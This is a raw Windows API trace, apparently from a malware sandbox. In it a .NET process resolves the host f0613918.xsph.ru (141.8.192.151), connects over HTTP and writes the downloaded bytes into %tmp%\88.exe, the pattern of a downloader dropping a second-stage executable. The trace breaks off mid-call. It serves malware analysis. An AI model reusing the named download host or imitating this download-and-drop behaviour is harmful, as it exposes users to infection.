RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.RequireCertificateEKUs", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f260 | out: phkResult=0x36f260*=0x0) returned 0x2 [0226.597] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f260 | out: phkResult=0x36f260*=0x354) returned 0x0 [0226.597] RegQueryValueExW (in: hKey=0x354, lpValueName="RequireCertificateEKUs", lpReserved=0x0, lpType=0x36f27c, lpData=0x0, lpcbData=0x36f278*=0x0 | out: lpType=0x36f27c*=0x0, lpData=0x0, lpcbData=0x36f278*=0x0) returned 0x2 [0226.597] RegCloseKey (hKey=0x354) returned 0x0 [0226.912] GetACP () returned 0x4e4 [0226.915] ExpandEnvironmentStringsW (in: lpSrc="%tmp%", lpDst=0x36f1cc, nSize=0x64 | out: lpDst="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 0x25 [0226.915] ExpandEnvironmentStringsW (in: lpSrc="%tmp%\\88.exe", lpDst=0x36f1cc, nSize=0x64 | out: lpDst="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe") returned 0x2c [0227.063] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\", lpszLongPath=0x36ecdc, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\kEecfMwgj\\") returned 0x13 [0227.064] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\88.exe", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\88.exe", lpFilePart=0x0) returned 0x2c [0227.064] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f208) returned 1 [0227.064] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\88.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\88.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x364 [0227.066] GetFileType (hFile=0x364) returned 0x1 [0227.066] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f204) returned 1 [0227.066] GetFileType (hFile=0x364) returned 0x1 [0227.115] GetCurrentProcess () returned 0xffffffff [0227.115] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36eec0 | out: TokenHandle=0x36eec0*=0x368) returned 1 [0227.121] CloseHandle (hObject=0x368) returned 1 [0227.121] GetCurrentProcess () returned 0xffffffff [0227.121] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36eed8 | out: TokenHandle=0x36eed8*=0x368) returned 1 [0227.122] CloseHandle (hObject=0x368) returned 1 [0227.125] QueryPerformanceFrequency (in: lpFrequency=0xb7328 | out: lpFrequency=0xb7328*=100000000) returned 1 [0227.126] QueryPerformanceCounter (in: lpPerformanceCount=0x36f288 | out: lpPerformanceCount=0x36f288*=3095076112399) returned 1 [0227.130] GetCurrentProcess () returned 0xffffffff [0227.130] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36ee9c | out: TokenHandle=0x36ee9c*=0x368) returned 1 [0227.178] CloseHandle (hObject=0x368) returned 1 [0227.178] GetCurrentProcess () returned 0xffffffff [0227.178] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36eeb4 | out: TokenHandle=0x36eeb4*=0x368) returned 1 [0227.179] CloseHandle (hObject=0x368) returned 1 [0227.185] GetCurrentProcess () returned 0xffffffff [0227.185] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36f16c | out: TokenHandle=0x36f16c*=0x368) returned 1 [0227.764] CoTaskMemAlloc (cb=0xcc0) returned 0x5ec0d80 [0227.764] RasEnumConnectionsW (in: param_1=0x5ec0d80, param_2=0x36f17c, param_3=0x36f180 | out: param_1=0x5ec0d80, param_2=0x36f17c, param_3=0x36f180) returned 0x0 [0228.026] CoTaskMemFree (pv=0x5ec0d80) [0228.027] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x394 [0228.027] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398 [0228.028] ioctlsocket (in: s=0x394, cmd=-2147195266, argp=0x36f184 | out: argp=0x36f184) returned 0 [0228.028] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x39c [0228.029] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a0 [0228.029] ioctlsocket (in: s=0x39c, cmd=-2147195266, argp=0x36f184 | out: argp=0x36f184) returned 0 [0228.030] WSAIoctl (in: s=0x394, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x36f16c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x36f16c, lpOverlapped=0x0) returned -1 [0228.031] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x36ee9c, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0228.066] WSAEventSelect (s=0x394, hEventObject=0x398, lNetworkEvents=512) returned 0 [0228.066] WSAIoctl (in: s=0x39c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x36f16c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x36f16c, lpOverlapped=0x0) returned -1 [0228.066] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x36ee9c, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0228.066] WSAEventSelect (s=0x39c, hEventObject=0x3a0, lNetworkEvents=512) returned 0 [0228.067] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a4 [0228.067] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x3a4, param_3=0x3) returned 0x0 [0228.076] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x36f198 | out: phkResult=0x36f198*=0x3bc) returned 0x0 [0228.077] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f14c | out: phkResult=0x36f14c*=0x3c0) returned 0x0 [0228.078] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c4 [0228.078] RegNotifyChangeKeyValue (hKey=0x3c0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3c4, fAsynchronous=1) returned 0x0 [0228.080] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f150 | out: phkResult=0x36f150*=0x3c8) returned 0x0 [0228.080] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3cc [0228.080] RegNotifyChangeKeyValue (hKey=0x3c8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3cc, fAsynchronous=1) returned 0x0 [0228.081] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f150 | out: phkResult=0x36f150*=0x3d0) returned 0x0 [0228.081] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3d4 [0228.081] RegNotifyChangeKeyValue (hKey=0x3d0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3d4, fAsynchronous=1) returned 0x0 [0228.082] GetCurrentProcess () returned 0xffffffff [0228.082] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36f140 | out: TokenHandle=0x36f140*=0x3d8) returned 1 [0228.087] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x36ea48 | out: phkResult=0x36ea48*=0x3dc) returned 0x0 [0228.087] RegQueryValueExW (in: hKey=0x3dc, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0x36ea64, lpData=0x0, lpcbData=0x36ea60*=0x0 | out: lpType=0x36ea64*=0x0, lpData=0x0, lpcbData=0x36ea60*=0x0) returned 0x2 [0228.087] RegCloseKey (hKey=0x3dc) returned 0x0 [0228.723] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x6f7838 [0228.832] WinHttpSetTimeouts (hInternet=0x6f7838, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1 [0228.832] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x36f14c | out: pProxyConfig=0x36f14c) returned 1 [0229.302] CloseHandle (hObject=0x368) returned 1 [0229.308] CoTaskMemAlloc (cb=0x20c) returned 0x7945e0 [0229.308] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_Disabled", lpBuffer=0x7945e0, nSize=0x104 | out: lpBuffer="") returned 0x0 [0229.308] CoTaskMemFree (pv=0x7945e0) [0229.308] CoTaskMemAlloc (cb=0x20c) returned 0x7945e0 [0229.308] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_MinCount", lpBuffer=0x7945e0, nSize=0x104 | out: lpBuffer="") returned 0x0 [0229.308] CoTaskMemFree (pv=0x7945e0) [0229.311] EtwEventRegister () returned 0x0 [0229.317] GetCurrentProcess () returned 0xffffffff [0229.317] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36ee64 | out: TokenHandle=0x36ee64*=0x414) returned 1 [0229.320] CloseHandle (hObject=0x414) returned 1 [0229.320] GetCurrentProcess () returned 0xffffffff [0229.321] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36ee7c | out: TokenHandle=0x36ee7c*=0x414) returned 1 [0229.321] CloseHandle (hObject=0x414) returned 1 [0229.329] SetEvent (hEvent=0x250) returned 1 [0229.348] GetCurrentProcess () returned 0xffffffff [0229.348] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36edc0 | out: TokenHandle=0x36edc0*=0x42c) returned 1 [0229.350] CloseHandle (hObject=0x42c) returned 1 [0229.350] GetCurrentProcess () returned 0xffffffff [0229.350] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36edd8 | out: TokenHandle=0x36edd8*=0x42c) returned 1 [0229.351] CloseHandle (hObject=0x42c) returned 1 [0229.352] GetTimeZoneInformation (in: lpTimeZoneInformation=0x36ef88 | out: lpTimeZoneInformation=0x36ef88) returned 0x1 [0229.353] SetEvent (hEvent=0x250) returned 1 [0229.364] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x36f0e4 | out: pFixedInfo=0x0, pOutBufLen=0x36f0e4) returned 0x6f [0229.390] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0x72e498 [0229.390] GetNetworkParams (in: pFixedInfo=0x72e498, pOutBufLen=0x36f0e4 | out: pFixedInfo=0x72e498, pOutBufLen=0x36f0e4) returned 0x0 [0229.406] LocalFree (hMem=0x72e498) returned 0x0 [0229.409] CoTaskMemAlloc (cb=0x20c) returned 0x5ed1df0 [0229.409] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_Disabled", lpBuffer=0x5ed1df0, nSize=0x104 | out: lpBuffer="") returned 0x0 [0229.409] CoTaskMemFree (pv=0x5ed1df0) [0229.409] CoTaskMemAlloc (cb=0x20c) returned 0x5ed1df0 [0229.409] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_MinCount", lpBuffer=0x5ed1df0, nSize=0x104 | out: lpBuffer="") returned 0x0 [0229.410] CoTaskMemFree (pv=0x5ed1df0) [0229.416] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x430 [0229.417] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x42c [0229.418] GetAddrInfoW (in: pNodeName="f0613918.xsph.ru", pServiceName=0x0, pHints=0x36efc0*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x36ef68 | out: ppResult=0x36ef68*=0x5ebbf20*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="f0613918.xsph.ru", ai_addr=0x5e86db0*(sa_family=2, sin_port=0x0, sin_addr="141.8.192.151"), ai_next=0x0)) returned 0 [0229.596] FreeAddrInfoW (pAddrInfo=0x5ebbf20*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="f0613918.xsph.ru", ai_addr=0x5e86db0*(sa_family=2, sin_port=0x0, sin_addr="141.8.192.151"), ai_next=0x0)) [0229.598] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x418 [0229.599] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x438 [0229.599] ioctlsocket (in: s=0x418, cmd=-2147195266, argp=0x36ef98 | out: argp=0x36ef98) returned 0 [0229.599] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x43c [0229.600] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x440 [0229.600] ioctlsocket (in: s=0x43c, cmd=-2147195266, argp=0x36ef98 | out: argp=0x36ef98) returned 0 [0229.600] WSAIoctl (in: s=0x418, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x36ef80, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x36ef80, lpOverlapped=0x0) returned -1 [0229.600] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x36ecb0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0229.600] WSAEventSelect (s=0x418, hEventObject=0x438, lNetworkEvents=512) returned 0 [0229.601] WSAIoctl (in: s=0x43c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x36ef80, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x36ef80, lpOverlapped=0x0) returned -1 [0229.601] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x36ecb0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0229.601] WSAEventSelect (s=0x43c, hEventObject=0x440, lNetworkEvents=512) returned 0 [0229.601] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x36ef7c*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x36ef7c*=0x7ec) returned 0x6f [0229.610] LocalAlloc (uFlags=0x0, uBytes=0x7ec) returned 0x5e94a58 [0229.610] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x5e94a58, SizePointer=0x36ef7c*=0x7ec | out: AdapterAddresses=0x5e94a58*(Alignment=0xf00000178, Length=0x178, IfIndex=0xf, Next=0x5e94d24, AdapterName="{2E4C7576-F100-4C39-A70C-5E6D4E6BF9B7}", FirstUnicastAddress=0x5e94c98, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection #4", FriendlyName="Local Area Connection 4", PhysicalAddress=([0]=0x0, [1]=0x21, [2]=0x7a, [3]=0x46, [4]=0x94, [5]=0xa8, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x3e5, DdnsEnabled=0x3e5, RegisterAdapterSuffix=0x3e5, Dhcpv4Enabled=0x3e5, ReceiveOnly=0x3e5, NoMulticast=0x3e5, Ipv6OtherStatefulConfig=0x3e5, NetbiosOverTcpipEnabled=0x3e5, Ipv4Enabled=0x3e5, Ipv6Enabled=0x3e5, Ipv6ManagedAddressConfigurationSupported=0x3e5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0xf, ZoneIndices=([0]=0xf, [1]=0xf, [2]=0xf, [3]=0xf, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6000009000000, Dhcpv4Server.lpSockaddr=0x5e94bd0*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11de7039846ee341, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x27, [5]=0xbf, [6]=0xe, [7]=0x9e, [8]=0x0, [9]=0x26, [10]=0x67, [11]=0xd5, [12]=0xc6, [13]=0x31, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x12c89f1d, FirstDnsSuffix=0x0), SizePointer=0x36ef7c*=0x7ec) returned 0x0 [0229.645] LocalFree (hMem=0x5e94a58) returned 0x0 [0229.646] WSAConnect (in: s=0x430, name=0x25ac23c*(sa_family=2, sin_port=0x50, sin_addr="141.8.192.151"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0229.698] closesocket (s=0x42c) returned 0 [0229.705] send (s=0x430, buf=0x25acd60*, len=72, flags=0) returned 72 [0229.709] setsockopt (s=0x430, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0229.709] recv (in: s=0x430, buf=0x25a8b20, len=4096, flags=0 | out: buf=0x25a8b20*) returned 4096 [0229.782] setsockopt (s=0x430, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0229.784] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 9044 [0229.785] WriteFile (in: hFile=0x364, lpBuffer=0x25bf118*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25bf118*, lpNumberOfBytesWritten=0x36f24c*=0x1000, lpOverlapped=0x0) returned 1 [0229.841] WriteFile (in: hFile=0x364, lpBuffer=0x25af19c*, nNumberOfBytesToWrite=0x220c, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af19c*, lpNumberOfBytesWritten=0x36f24c*=0x220c, lpOverlapped=0x0) returned 1 [0229.842] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 30660 [0229.842] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x77c4, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x77c4, lpOverlapped=0x0) returned 1 [0229.843] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 61320 [0229.895] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0xef88, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0xef88, lpOverlapped=0x0) returned 1 [0230.035] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 65536 [0230.035] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0230.037] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 7464 [0230.037] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x1d28, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x1d28, lpOverlapped=0x0) returned 1 [0230.037] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 23360 [0230.083] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x5b40, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x5b40, lpOverlapped=0x0) returned 1 [0230.084] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 40880 [0230.084] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x9fb0, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x9fb0, lpOverlapped=0x0) returned 1 [0230.085] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 23360 [0230.129] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x5b40, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x5b40, lpOverlapped=0x0) returned 1 [0230.131] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 8760 [0230.132] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x2238, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x2238, lpOverlapped=0x0) returned 1 [0230.134] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 32120 [0230.134] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x7d78, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x7d78, lpOverlapped=0x0) returned 1 [0230.135] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 23360 [0230.180] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x5b40, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x5b40, lpOverlapped=0x0) returned 1 [0230.181] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 65536 [0230.181] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0230.183] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 65536 [0230.183] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0230.185] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 3248 [0230.185] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 26280 [0230.224] WriteFile (in: hFile=0x364, lpBuffer=0x25bf118*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25bf118*, lpNumberOfBytesWritten=0x36f24c*=0x1000, lpOverlapped=0x0) returned 1 [0230.225] WriteFile (in: hFile=0x364, lpBuffer=0x25af3a4*, nNumberOfBytesToWrite=0x6358, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af3a4*, lpNumberOfBytesWritten=0x36f24c*=0x6358, lpOverlapped=0x0) returned 1 [0230.227] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 65536 [0230.227] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0230.234] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 65536 [0230.234] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0x10000, lpOverlapped=0x0) returned 1 [0230.236] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 61648 [0230.236] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0xf0d0, lpNumberOfBytesWritten=0x36f24c, lpOverlapped=0x0 | out: lpBuffer=0x25af054*, lpNumberOfBytesWritten=0x36f24c*=0xf0d0, lpOverlapped=0x0) returned 1 [0230.238] recv (in: s=0x430, buf=0x25af054, len=65536, flags=0 | out: buf=0x25af054*) returned 64240 [0230.272] WriteFile (in: hFile=0x364, lpBuffer=0x25af054*, nNumberOfBytesToWrite=0xfaf0, 